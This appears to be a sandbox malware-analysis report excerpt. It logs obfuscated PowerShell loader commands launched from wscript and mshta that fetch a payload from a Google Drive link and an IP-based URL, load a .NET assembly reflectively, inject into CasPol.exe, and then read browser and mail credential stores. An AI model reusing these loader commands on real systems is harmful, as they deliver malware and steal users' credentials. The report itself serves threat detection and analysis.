tmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhetklvvk0yvtjqicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagieferc10exbficagicagicagicagicagicagicagicagicagicagicaglu1fbujfcmrlrmlosvrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9uiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagd0xbywd3b3csc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagbixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbhumosdwludcagicagicagicagicagicagicagicagicagicagicagigd3ccxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbxdlcpoycgicagicagicagicagicagicagicagicagicagicagicattmftzsagicagicagicagicagicagicagicagicagicagicagicjizutsqxf0qweiicagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcgfdzsagicagicagicagicagicagicagicagicagicagicagihb1tlfcdkdfdsagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakwerosvvwttjvmla6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdcumtc0lje0ni40ni81ny9wawn0dxjld2l0agdyzwf0bmv3c3dpdghnb29kdghpbmdzb25izxn0cgxhy2uudelgiiwijevuvjpbufbeqvrbxhbpy3r1cmv3axroz3jlyxruzxdzd2l0agdvb2r0agluz3nvbmjllnzicyismcwwktttvefydc1zbgvlccgzktttdgfydcagicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefccgljdhvyzxdpdghncmvhdg5ld3n3axroz29vzhroaw5nc29uymuudmjzig=='+[char]34+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhbzsg9nrvsymv0rjfbzae9trvszmf0rj3gnksgoj1prywltywdlvxjsid0guun4ahqnkyd0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjynkyd2uzrzvu95ym5ilxnedlvoqll3dxiguun4o1pryxdlyknsawvudca9ie5ldy1pymply3qgu3knkydzdgvtlk5ldc5xzwjdbgllbnq7wmthaw1hz2vcjysnexrlcya9ifpryxdlyknsawvudc5eb3dubg9hzerhdgeowmthaw1hz2vvcmwpo1prywltywdlvgv4dca9ifttexn0jysnzw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkfprywltywdlqnl0zxmpo1pryxn0yxj0rmxhzya9iffdedwnkyc8qkftrty0x1nuqvjupj5rq3g7wmthzw5krmxhzya9iffdedw8qkftrty0x0vord4+uun4o1pryxn0yxj0sw5kzxggpsbaa2fpbwfnzvrlehqusw5kzxhpzihaa2fzdgfydezsywcpo1prywvuzeluzgv4id0gwmthaw1hz2vuzxh0lkluzgv4t2yowmthzw5krmxhzycrjyk7wmthc3rhcnrjbmrlecatz2ugmcatyw4nkydkifprywvuzeluzgv4ic1ndcbajysna2fzdccrj2fydeluzgv4o1pryxn0yxj0sw4nkydkzxggkz0gwmthc3rhcnrgbgfnlkxlbmd0adtaa2fiyxnlnjrmzw5ndggnkycgpsbaa2flbmrjbmrlecatifpryxn0yxj0sw5kzxg7wmthymfzzty0q29tbwfuzca9ifprywltywdlvgv4dc5tdwjzdhjpbicrj2cowmthc3rhcnrjbmrlecwgjysnwmthymfzjysnzty0tgvuz3rokttaa2fiyxnlnjrszxzlcnnlzca9ic1qb2luichaa2fiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgs041iezvckvhy2gtt2jqzwn0ihsgwmsnkydhxyb9kvstms4ulshaa2fijysnyxmnkydlnjrdb21tyw5klkxlbmd0acldo1prywnvbw1hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnljysnnjrtdhjpbmcowmthymfzzty0umv2zxjzzwqpo1prywxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchaa2fjb21tyscrj25kqnl0zxmpo1pryxzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzscrj3rnzxrob2qouun4vkfjuun4kttaa2f2ywlnzxrob2qusw52b2tlkfpryw51bgwsieaouun4dhh0lljsrlzhr0zslzc1lzy0ljy0ms40nzeunzaxly86chr0affdecwguun4zgvzyxrpdmfkb1fdecwguumnkyd4zgvzyxrpdmfkb1fdecwguun4zgvzyxrpdmfkb1fdecwguun4q2fzjysnug9suun4lcbrq3hkzxnhdgl2ywrvuscrj0n4lcbrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3hkzxnhdgl2ywrvuun4lffdegrlc2f0axzhzg9rq3gsuun4zgvzyxrpdmfkb1fdecxrq3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,31_2_0041881C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,41_2_004082CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0041739B GetVersionExW,31_2_0041739B
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
